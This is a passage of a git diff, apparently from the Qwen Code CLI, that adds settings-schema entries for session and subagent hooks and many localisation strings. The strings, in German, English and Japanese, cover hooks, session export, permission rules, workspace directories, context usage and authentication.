[], + description: 'Hooks that execute when a new session starts or resumes.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + SessionEnd: { + type: 'array', + label: 'Session End Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute when a session ends.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + PreCompact: { + type: 'array', + label: 'Pre Compact Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute before conversation compaction.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + SubagentStart: { + type: 'array', + label: 'Subagent Start Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: + 'Hooks that execute when a subagent (Task tool call) is started.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + SubagentStop: { + type: 'array', + label: 'Subagent Stop Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: + 'Hooks that execute right before a subagent (Task tool call) concludes its response.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + PermissionRequest: { + type: 'array', + label: 'Permission Request Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: + 'Hooks that execute when a permission dialog is displayed.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, }, }, }, + + experimental: { + type: 'object', + label: 'Experimental', + category: 'Experimental', + requiresRestart: true, + default: {}, + description: 'Setting to enable experimental features', + showInDialog: false, + properties: {}, + }, } as const satisfies SettingsSchema; export type SettingsSchemaType = typeof SETTINGS_SCHEMA; diff --git a/packages/cli/src/constants/codingPlan.ts b/packages/cli/src/constants/codingPlan.ts index bc28a781a..87be46542 100644 --- a/packages/cli/src/constants/codingPlan.ts +++ b/packages/cli/src/constants/codingPlan.ts @@ -97,7 +97,7 @@ export function generateCodingPlanTemplate( extra_body: { enable_thinking: true, }, - contextWindowSize: 1000000, + contextWindowSize: 196608, }, }, { @@ -222,7 +222,7 @@ export function generateCodingPlanTemplate( extra_body: { enable_thinking: true, }, - contextWindowSize: 1000000, + contextWindowSize: 196608, }, }, { diff --git a/packages/cli/src/gemini.test.tsx b/packages/cli/src/gemini.test.tsx index 9b47de5b5..b9ddb97fa 100644 --- a/packages/cli/src/gemini.test.tsx +++ b/packages/cli/src/gemini.test.tsx @@ -467,6 +467,8 @@ describe('gemini.tsx main function kitty protocol', () => { debug: undefined, prompt: undefined, promptInteractive: undefined, + systemPrompt: undefined, + appendSystemPrompt: undefined, query: undefined, yolo: undefined, approvalMode: undefined, diff --git a/packages/cli/src/gemini.tsx b/packages/cli/src/gemini.tsx index 58a735c73..477aecd7e 100644 --- a/packages/cli/src/gemini.tsx +++ b/packages/cli/src/gemini.tsx @@ -35,6 +35,7 @@ import { KeypressProvider } from './ui/contexts/KeypressContext.js'; import { SessionStatsProvider } from './ui/contexts/SessionContext.js'; import { SettingsContext } from './ui/contexts/SettingsContext.js'; import { VimModeProvider } from './ui/contexts/VimModeContext.js'; +import { AgentViewProvider } from './ui/contexts/AgentViewContext.js'; import { useKittyKeyboardProtocol } from './ui/hooks/useKittyKeyboardProtocol.js'; import { themeManager } from './ui/themes/theme-manager.js'; import { detectAndEnableKittyProtocol } from './ui/utils/kittyProtocolDetector.js'; @@ -162,13 +163,15 @@ export async function startInteractiveUI( > - + + + @@ -348,6 +351,7 @@ export async function main() { argv, process.cwd(), argv.extensions, + settings, ); // Register cleanup for MCP clients as early as possible diff --git a/packages/cli/src/i18n/locales/de.js b/packages/cli/src/i18n/locales/de.js index 455411096..aa4a6d552 100644 --- a/packages/cli/src/i18n/locales/de.js +++ b/packages/cli/src/i18n/locales/de.js @@ -99,6 +99,7 @@ export default { 'Analysiert das Projekt und erstellt eine maßgeschneiderte QWEN.md-Datei.', 'List available Qwen Code tools. Usage: /tools [desc]': 'Verfügbare Qwen Code Werkzeuge auflisten. Verwendung: /tools [desc]', + 'List available skills.': 'Verfügbare Skills auflisten.', 'Available Qwen Code CLI tools:': 'Verfügbare Qwen Code CLI-Werkzeuge:', 'No tools available': 'Keine Werkzeuge verfügbar', 'View or change the approval mode for tool usage': @@ -376,6 +377,7 @@ export default { 'Diese Editoren werden derzeit unterstützt. Bitte beachten Sie, dass einige Editoren nicht im Sandbox-Modus verwendet werden können.', 'Your preferred editor is:': 'Ihr bevorzugter Editor ist:', 'Manage extensions': 'Erweiterungen verwalten', + 'Manage installed extensions': 'Installierte Erweiterungen verwalten', 'List active extensions': 'Aktive Erweiterungen auflisten', 'Update extensions. Usage: update |--all': 'Erweiterungen aktualisieren. Verwendung: update |--all', @@ -585,6 +587,38 @@ export default { 'Fehler beim Konfigurieren von {{terminalName}}.', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': 'Ihr Terminal ist bereits für optimale Erfahrung mit mehrzeiliger Eingabe konfiguriert (Umschalt+Enter und Strg+Enter).', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': 'Qwen Code-Hooks verwalten', + 'List all configured hooks': 'Alle konfigurierten Hooks auflisten', + 'Enable a disabled hook': 'Einen deaktivierten Hook aktivieren', + 'Disable an active hook': 'Einen aktiven Hook deaktivieren', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + 'Den Nachrichtenverlauf der aktuellen Sitzung in eine Datei exportieren', + 'Export session to HTML format': 'Sitzung in das HTML-Format exportieren', + 'Export session to JSON format': 'Sitzung in das JSON-Format exportieren', + 'Export session to JSONL format (one message per line)': + 'Sitzung in das JSONL-Format exportieren (eine Nachricht pro Zeile)', + 'Export session to markdown format': + 'Sitzung in das Markdown-Format exportieren', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + 'Personalisierte Programmier-Einblicke aus Ihrem Chatverlauf generieren', + + // ============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume a previous session': 'Eine vorherige Sitzung fortsetzen', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + 'Einen Tool-Aufruf wiederherstellen. Dadurch werden Konversations- und Dateiverlauf auf den Zustand zurückgesetzt, in dem der Tool-Aufruf vorgeschlagen wurde', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': 'Terminal-Typ konnte nicht erkannt werden. Unterstützte Terminals: VS Code, Cursor, Windsurf und Trae.', 'Terminal "{{terminal}}" is not supported yet.': @@ -1012,6 +1046,8 @@ export default { "Allow execution of: '{{command}}'?": "Ausführung erlauben von: '{{command}}'?", 'Yes, allow always ...': 'Ja, immer erlauben ...', + 'Always allow in this project': 'In diesem Projekt immer erlauben', + 'Always allow for this user': 'Für diesen Benutzer immer erlauben', 'Yes, and auto-accept edits': 'Ja, und Änderungen automatisch akzeptieren', 'Yes, and manually approve edits': 'Ja, und Änderungen manuell genehmigen', 'No, keep planning (esc)': 'Nein, weiter planen (Esc)', @@ -1180,6 +1216,75 @@ export default { // Dialogs - Permissions // ============================================================================ 'Manage folder trust settings': 'Ordnervertrauenseinstellungen verwalten', + 'Manage permission rules': 'Berechtigungsregeln verwalten', + Allow: 'Erlauben', + Ask: 'Fragen', + Deny: 'Verweigern', + Workspace: 'Arbeitsbereich', + "Qwen Code won't ask before using allowed tools.": + 'Qwen Code fragt nicht, bevor erlaubte Tools verwendet werden.', + 'Qwen Code will ask before using these tools.': + 'Qwen Code fragt, bevor diese Tools verwendet werden.', + 'Qwen Code is not allowed to use denied tools.': + 'Qwen Code darf verweigerte Tools nicht verwenden.', + 'Manage trusted directories for this workspace.': + 'Vertrauenswürdige Verzeichnisse für diesen Arbeitsbereich verwalten.', + 'Any use of the {{tool}} tool': 'Jede Verwendung des {{tool}}-Tools', + "{{tool}} commands matching '{{pattern}}'": + "{{tool}}-Befehle, die '{{pattern}}' entsprechen", + 'From user settings': 'Aus Benutzereinstellungen', + 'From project settings': 'Aus Projekteinstellungen', + 'From session': 'Aus Sitzung', + 'Project settings (local)': 'Projekteinstellungen (lokal)', + 'Saved in .qwen/settings.local.json': + 'Gespeichert in .qwen/settings.local.json', + 'Project settings': 'Projekteinstellungen', + 'Checked in at .qwen/settings.json': 'Eingecheckt in .qwen/settings.json', + 'User settings': 'Benutzereinstellungen', + 'Saved in at ~/.qwen/settings.json': 'Gespeichert in ~/.qwen/settings.json', + 'Add a new rule…': 'Neue Regel hinzufügen…', + 'Add {{type}} permission rule': '{{type}}-Berechtigungsregel hinzufügen', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + 'Berechtigungsregeln sind ein Toolname, optional gefolgt von einem Bezeichner in Klammern.', + 'e.g.,': 'z.B.', + or: 'oder', + 'Enter permission rule…': 'Berechtigungsregel eingeben…', + 'Enter to submit · Esc to cancel': 'Enter zum Absenden · Esc zum Abbrechen', + 'Where should this rule be saved?': 'Wo soll diese Regel gespeichert werden?', + 'Enter to confirm · Esc to cancel': + 'Enter zum Bestätigen · Esc zum Abbrechen', + 'Delete {{type}} rule?': '{{type}}-Regel löschen?', + 'Are you sure you want to delete this permission rule?': + 'Sind Sie sicher, dass Sie diese Berechtigungsregel löschen möchten?', + 'Permissions:': 'Berechtigungen:', + '(←/→ or tab to cycle)': '(←/→ oder Tab zum Wechseln)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + '↑↓ navigieren · Enter auswählen · Tippen suchen · Esc abbrechen', + 'Search…': 'Suche…', + 'Use /trust to manage folder trust settings for this workspace.': + 'Verwenden Sie /trust, um die Ordnervertrauenseinstellungen für diesen Arbeitsbereich zu verwalten.', + // Workspace directory management + 'Add directory…': 'Verzeichnis hinzufügen…', + 'Add directory to workspace': 'Verzeichnis zum Arbeitsbereich hinzufügen', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'Qwen Code kann Dateien im Arbeitsbereich lesen und Bearbeitungen vornehmen, wenn die automatische Akzeptierung aktiviert ist.', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'Qwen Code kann Dateien in diesem Verzeichnis lesen und Bearbeitungen vornehmen, wenn die automatische Akzeptierung aktiviert ist.', + 'Enter the path to the directory:': 'Pfad zum Verzeichnis eingeben:', + 'Enter directory path…': 'Verzeichnispfad eingeben…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab zum Vervollständigen · Enter zum Hinzufügen · Esc zum Abbrechen', + 'Remove directory?': 'Verzeichnis entfernen?', + 'Are you sure you want to remove this directory from the workspace?': + 'Möchten Sie dieses Verzeichnis wirklich aus dem Arbeitsbereich entfernen?', + ' (Original working directory)': ' (Ursprüngliches Arbeitsverzeichnis)', + ' (from settings)': ' (aus Einstellungen)', + 'Directory does not exist.': 'Verzeichnis existiert nicht.', + 'Path is not a directory.': 'Pfad ist kein Verzeichnis.', + 'This directory is already in the workspace.': + 'Dieses Verzeichnis ist bereits im Arbeitsbereich.', + 'Already covered by existing directory: {{dir}}': + 'Bereits durch vorhandenes Verzeichnis abgedeckt: {{dir}}', // ============================================================================ // Status Bar @@ -1586,6 +1691,36 @@ export default { 'Neue Modellkonfigurationen sind für {{region}} verfügbar. Jetzt aktualisieren?', '{{region}} configuration updated successfully. Model switched to "{{model}}".': '{{region}}-Konfiguration erfolgreich aktualisiert. Modell auf "{{model}}" umgeschaltet.', + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).': + 'Erfolgreich mit {{region}} authentifiziert. API-Schlüssel und Modellkonfigurationen wurden in settings.json gespeichert (gesichert).', + + // ============================================================================ + // Context Usage Component + // ============================================================================ + 'Context Usage': 'Kontextnutzung', + 'No API response yet. Send a message to see actual usage.': + 'Noch keine API-Antwort. Senden Sie eine Nachricht, um die tatsächliche Nutzung anzuzeigen.', + 'Estimated pre-conversation overhead': + 'Geschätzte Vorabkosten vor der Unterhaltung', + 'Context window': 'Kontextfenster', + tokens: 'Tokens', + Used: 'Verwendet', + Free: 'Frei', + 'Autocompact buffer': 'Autokomprimierungs-Puffer', + 'Usage by category': 'Verwendung nach Kategorie', + 'System prompt': 'System-Prompt', + 'Built-in tools': 'Integrierte Tools', + 'MCP tools': 'MCP-Tools', + 'Memory files': 'Speicherdateien', + Skills: 'Fähigkeiten', + Messages: 'Nachrichten', + 'Show context window usage breakdown.': + 'Zeigt die Aufschlüsselung der Kontextfenster-Nutzung an.', + 'Run /context detail for per-item breakdown.': + 'Führen Sie /context detail für eine Aufschlüsselung nach Elementen aus.', + active: 'aktiv', + 'body loaded': 'Inhalt geladen', + memory: 'Speicher', '{{region}} configuration updated successfully.': '{{region}}-Konfiguration erfolgreich aktualisiert.', 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json.': @@ -1621,4 +1756,80 @@ export default { '↑/↓: Navigieren | Space/Enter: Umschalten | Esc: Abbrechen', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: Navigieren | Enter: Auswählen | Esc: Abbrechen', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + 'Qwen-Authentifizierung mit Qwen-OAuth oder Alibaba Cloud Coding Plan konfigurieren', + 'Authenticate using Qwen OAuth': 'Mit Qwen OAuth authentifizieren', + 'Authenticate using Alibaba Cloud Coding Plan': + 'Mit Alibaba Cloud Coding Plan authentifizieren', + 'Region for Coding Plan (china/global)': + 'Region für Coding Plan (china/global)', + 'API key for Coding Plan': 'API-Schlüssel für Coding Plan', + 'Show current authentication status': + 'Aktuellen Authentifizierungsstatus anzeigen', + 'Authentication completed successfully.': + 'Authentifizierung erfolgreich abgeschlossen.', + 'Starting Qwen OAuth authentication...': + 'Qwen OAuth-Authentifizierung wird gestartet...', + 'Successfully authenticated with Qwen OAuth.': + 'Erfolgreich mit Qwen OAuth authentifiziert.', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Authentifizierung mit Qwen OAuth fehlgeschlagen: {{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + 'Alibaba Cloud Coding Plan-Authentifizierung wird verarbeitet...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + 'Erfolgreich mit Alibaba Cloud Coding Plan authentifiziert.', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Authentifizierung mit Coding Plan fehlgeschlagen: {{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: 'Global', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': 'Region für Coding Plan auswählen:', + 'Enter your Coding Plan API key: ': + 'Geben Sie Ihren Coding Plan API-Schlüssel ein: ', + 'Select authentication method:': 'Authentifizierungsmethode auswählen:', + '\n=== Authentication Status ===\n': '\n=== Authentifizierungsstatus ===\n', + '⚠️ No authentication method configured.\n': + '⚠️ Keine Authentifizierungsmethode konfiguriert.\n', + 'Run one of the following commands to get started:\n': + 'Führen Sie einen der folgenden Befehle aus, um zu beginnen:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - Mit Qwen OAuth authentifizieren (kostenlos)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - Mit Alibaba Cloud Coding Plan authentifizieren\n', + 'Or simply run:': 'Oder einfach ausführen:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - Interaktive Authentifizierungseinrichtung\n', + '✓ Authentication Method: Qwen OAuth': + '✓ Authentifizierungsmethode: Qwen OAuth', + ' Type: Free tier': ' Typ: Kostenlos', + ' Limit: Up to 1,000 requests/day': ' Limit: Bis zu 1.000 Anfragen/Tag', + ' Models: Qwen latest models\n': ' Modelle: Qwen neueste Modelle\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ Authentifizierungsmethode: Alibaba Cloud Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': 'Global - Alibaba Cloud', + ' Region: {{region}}': ' Region: {{region}}', + ' Current Model: {{model}}': ' Aktuelles Modell: {{model}}', + ' Config Version: {{version}}': ' Konfigurationsversion: {{version}}', + ' Status: API key configured\n': ' Status: API-Schlüssel konfiguriert\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ Authentifizierungsmethode: Alibaba Cloud Coding Plan (Unvollständig)', + ' Issue: API key not found in environment or settings\n': + ' Problem: API-Schlüssel nicht in Umgebung oder Einstellungen gefunden\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' Führen Sie `qwen auth coding-plan` aus, um neu zu konfigurieren.\n', + '✓ Authentication Method: {{type}}': '✓ Authentifizierungsmethode: {{type}}', + ' Status: Configured\n': ' Status: Konfiguriert\n', + 'Failed to check authentication status: {{error}}': + 'Authentifizierungsstatus konnte nicht überprüft werden: {{error}}', + 'Select an option:': 'Option auswählen:', + 'Raw mode not available. Please run in an interactive terminal.': + 'Raw-Modus nicht verfügbar. Bitte in einem interaktiven Terminal ausführen.', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(↑ ↓ Pfeiltasten zum Navigieren, Enter zum Auswählen, Strg+C zum Beenden)\n', }; diff --git a/packages/cli/src/i18n/locales/en.js b/packages/cli/src/i18n/locales/en.js index cbaee7889..fb4433b2a 100644 --- a/packages/cli/src/i18n/locales/en.js +++ b/packages/cli/src/i18n/locales/en.js @@ -118,6 +118,7 @@ export default { 'Analyzes the project and creates a tailored QWEN.md file.', 'List available Qwen Code tools. Usage: /tools [desc]': 'List available Qwen Code tools. Usage: /tools [desc]', + 'List available skills.': 'List available skills.', 'Available Qwen Code CLI tools:': 'Available Qwen Code CLI tools:', 'No tools available': 'No tools available', 'View or change the approval mode for tool usage': @@ -459,6 +460,7 @@ export default { 'These editors are currently supported. Please note that some editors cannot be used in sandbox mode.', 'Your preferred editor is:': 'Your preferred editor is:', 'Manage extensions': 'Manage extensions', + 'Manage installed extensions': 'Manage installed extensions', 'List active extensions': 'List active extensions', 'Update extensions. Usage: update |--all': 'Update extensions. Usage: update |--all', @@ -659,6 +661,37 @@ export default { 'Failed to configure {{terminalName}}.', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': 'Manage Qwen Code hooks', + 'List all configured hooks': 'List all configured hooks', + 'Enable a disabled hook': 'Enable a disabled hook', + 'Disable an active hook': 'Disable an active hook', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + 'Export current session message history to a file', + 'Export session to HTML format': 'Export session to HTML format', + 'Export session to JSON format': 'Export session to JSON format', + 'Export session to JSONL format (one message per line)': + 'Export session to JSONL format (one message per line)', + 'Export session to markdown format': 'Export session to markdown format', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + 'generate personalized programming insights from your chat history', + + // ============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume a previous session': 'Resume a previous session', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.', 'Terminal "{{terminal}}" is not supported yet.': @@ -1069,6 +1102,8 @@ export default { 'No, suggest changes (esc)': 'No, suggest changes (esc)', "Allow execution of: '{{command}}'?": "Allow execution of: '{{command}}'?", 'Yes, allow always ...': 'Yes, allow always ...', + 'Always allow in this project': 'Always allow in this project', + 'Always allow for this user': 'Always allow for this user', 'Yes, and auto-accept edits': 'Yes, and auto-accept edits', 'Yes, and manually approve edits': 'Yes, and manually approve edits', 'No, keep planning (esc)': 'No, keep planning (esc)', @@ -1233,6 +1268,73 @@ export default { // Dialogs - Permissions // ============================================================================ 'Manage folder trust settings': 'Manage folder trust settings', + 'Manage permission rules': 'Manage permission rules', + Allow: 'Allow', + Ask: 'Ask', + Deny: 'Deny', + Workspace: 'Workspace', + "Qwen Code won't ask before using allowed tools.": + "Qwen Code won't ask before using allowed tools.", + 'Qwen Code will ask before using these tools.': + 'Qwen Code will ask before using these tools.', + 'Qwen Code is not allowed to use denied tools.': + 'Qwen Code is not allowed to use denied tools.', + 'Manage trusted directories for this workspace.': + 'Manage trusted directories for this workspace.', + 'Any use of the {{tool}} tool': 'Any use of the {{tool}} tool', + "{{tool}} commands matching '{{pattern}}'": + "{{tool}} commands matching '{{pattern}}'", + 'From user settings': 'From user settings', + 'From project settings': 'From project settings', + 'From session': 'From session', + 'Project settings (local)': 'Project settings (local)', + 'Saved in .qwen/settings.local.json': 'Saved in .qwen/settings.local.json', + 'Project settings': 'Project settings', + 'Checked in at .qwen/settings.json': 'Checked in at .qwen/settings.json', + 'User settings': 'User settings', + 'Saved in at ~/.qwen/settings.json': 'Saved in at ~/.qwen/settings.json', + 'Add a new rule…': 'Add a new rule…', + 'Add {{type}} permission rule': 'Add {{type}} permission rule', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.', + 'e.g.,': 'e.g.,', + or: 'or', + 'Enter permission rule…': 'Enter permission rule…', + 'Enter to submit · Esc to cancel': 'Enter to submit · Esc to cancel', + 'Where should this rule be saved?': 'Where should this rule be saved?', + 'Enter to confirm · Esc to cancel': 'Enter to confirm · Esc to cancel', + 'Delete {{type}} rule?': 'Delete {{type}} rule?', + 'Are you sure you want to delete this permission rule?': + 'Are you sure you want to delete this permission rule?', + 'Permissions:': 'Permissions:', + '(←/→ or tab to cycle)': '(←/→ or tab to cycle)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel', + 'Search…': 'Search…', + 'Use /trust to manage folder trust settings for this workspace.': + 'Use /trust to manage folder trust settings for this workspace.', + // Workspace directory management + 'Add directory…': 'Add directory…', + 'Add directory to workspace': 'Add directory to workspace', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.', + 'Enter the path to the directory:': 'Enter the path to the directory:', + 'Enter directory path…': 'Enter directory path…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab to complete · Enter to add · Esc to cancel', + 'Remove directory?': 'Remove directory?', + 'Are you sure you want to remove this directory from the workspace?': + 'Are you sure you want to remove this directory from the workspace?', + ' (Original working directory)': ' (Original working directory)', + ' (from settings)': ' (from settings)', + 'Directory does not exist.': 'Directory does not exist.', + 'Path is not a directory.': 'Path is not a directory.', + 'This directory is already in the workspace.': + 'This directory is already in the workspace.', + 'Already covered by existing directory: {{dir}}': + 'Already covered by existing directory: {{dir}}', // ============================================================================ // Status Bar @@ -1639,6 +1741,34 @@ export default { 'New model configurations are available for {{region}}. Update now?', '{{region}} configuration updated successfully. Model switched to "{{model}}".': '{{region}} configuration updated successfully. Model switched to "{{model}}".', + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).': + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).', + + // ============================================================================ + // Context Usage Component + // ============================================================================ + 'Context Usage': 'Context Usage', + 'No API response yet. Send a message to see actual usage.': + 'No API response yet. Send a message to see actual usage.', + 'Estimated pre-conversation overhead': 'Estimated pre-conversation overhead', + 'Context window': 'Context window', + tokens: 'tokens', + Used: 'Used', + Free: 'Free', + 'Autocompact buffer': 'Autocompact buffer', + 'Usage by category': 'Usage by category', + 'System prompt': 'System prompt', + 'Built-in tools': 'Built-in tools', + 'MCP tools': 'MCP tools', + 'Memory files': 'Memory files', + Skills: 'Skills', + Messages: 'Messages', + 'Show context window usage breakdown.': + 'Show context window usage breakdown.', + 'Run /context detail for per-item breakdown.': + 'Run /context detail for per-item breakdown.', + 'body loaded': 'body loaded', + memory: 'memory', '{{region}} configuration updated successfully.': '{{region}} configuration updated successfully.', 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json.': @@ -1673,4 +1803,77 @@ export default { '↑/↓: Navigate | Space/Enter: Toggle | Esc: Cancel', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: Navigate | Enter: Select | Esc: Cancel', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan', + 'Authenticate using Qwen OAuth': 'Authenticate using Qwen OAuth', + 'Authenticate using Alibaba Cloud Coding Plan': + 'Authenticate using Alibaba Cloud Coding Plan', + 'Region for Coding Plan (china/global)': + 'Region for Coding Plan (china/global)', + 'API key for Coding Plan': 'API key for Coding Plan', + 'Show current authentication status': 'Show current authentication status', + 'Authentication completed successfully.': + 'Authentication completed successfully.', + 'Starting Qwen OAuth authentication...': + 'Starting Qwen OAuth authentication...', + 'Successfully authenticated with Qwen OAuth.': + 'Successfully authenticated with Qwen OAuth.', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Failed to authenticate with Qwen OAuth: {{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + 'Processing Alibaba Cloud Coding Plan authentication...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + 'Successfully authenticated with Alibaba Cloud Coding Plan.', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Failed to authenticate with Coding Plan: {{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: 'Global', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': 'Select region for Coding Plan:', + 'Enter your Coding Plan API key: ': 'Enter your Coding Plan API key: ', + 'Select authentication method:': 'Select authentication method:', + '\n=== Authentication Status ===\n': '\n=== Authentication Status ===\n', + '⚠️ No authentication method configured.\n': + '⚠️ No authentication method configured.\n', + 'Run one of the following commands to get started:\n': + 'Run one of the following commands to get started:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n', + 'Or simply run:': 'Or simply run:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - Interactive authentication setup\n', + '✓ Authentication Method: Qwen OAuth': '✓ Authentication Method: Qwen OAuth', + ' Type: Free tier': ' Type: Free tier', + ' Limit: Up to 1,000 requests/day': ' Limit: Up to 1,000 requests/day', + ' Models: Qwen latest models\n': ' Models: Qwen latest models\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ Authentication Method: Alibaba Cloud Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': 'Global - Alibaba Cloud', + ' Region: {{region}}': ' Region: {{region}}', + ' Current Model: {{model}}': ' Current Model: {{model}}', + ' Config Version: {{version}}': ' Config Version: {{version}}', + ' Status: API key configured\n': ' Status: API key configured\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)', + ' Issue: API key not found in environment or settings\n': + ' Issue: API key not found in environment or settings\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' Run `qwen auth coding-plan` to re-configure.\n', + '✓ Authentication Method: {{type}}': '✓ Authentication Method: {{type}}', + ' Status: Configured\n': ' Status: Configured\n', + 'Failed to check authentication status: {{error}}': + 'Failed to check authentication status: {{error}}', + 'Select an option:': 'Select an option:', + 'Raw mode not available. Please run in an interactive terminal.': + 'Raw mode not available. Please run in an interactive terminal.', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n', }; diff --git a/packages/cli/src/i18n/locales/ja.js b/packages/cli/src/i18n/locales/ja.js index 02898e8bc..b06a6fdef 100644 --- a/packages/cli/src/i18n/locales/ja.js +++ b/packages/cli/src/i18n/locales/ja.js @@ -85,6 +85,7 @@ export default { 'プロジェクトを分析し、カスタマイズされた QWEN.md ファイルを作成', 'List available Qwen Code tools. Usage: /tools [desc]': '利用可能な Qwen Code ツールを一覧表示。使い方: /tools [desc]', + 'List available skills.': '利用可能なスキルを一覧表示する。', 'Available Qwen Code CLI tools:': '利用可能な Qwen Code CLI ツール:', 'No tools available': '利用可能なツールはありません', 'View or change the approval mode for tool usage': @@ -328,6 +329,7 @@ export default { 'ワークスペース内のすべてのディレクトリを表示', 'set external editor preference': '外部エディタの設定', 'Manage extensions': '拡張機能を管理', + 'Manage installed extensions': 'インストール済みの拡張機能を管理する', 'List active extensions': '有効な拡張機能を一覧表示', 'Update extensions. Usage: update |--all': '拡張機能を更新。使い方: update <拡張機能名>|--all', @@ -371,6 +373,38 @@ export default { '{{terminalName}} の設定に失敗しました', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': 'ターミナルは複数行入力(Shift+Enter と Ctrl+Enter)に最適化されています', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': 'Qwen Code のフックを管理する', + 'List all configured hooks': '設定済みのフックをすべて表示する', + 'Enable a disabled hook': 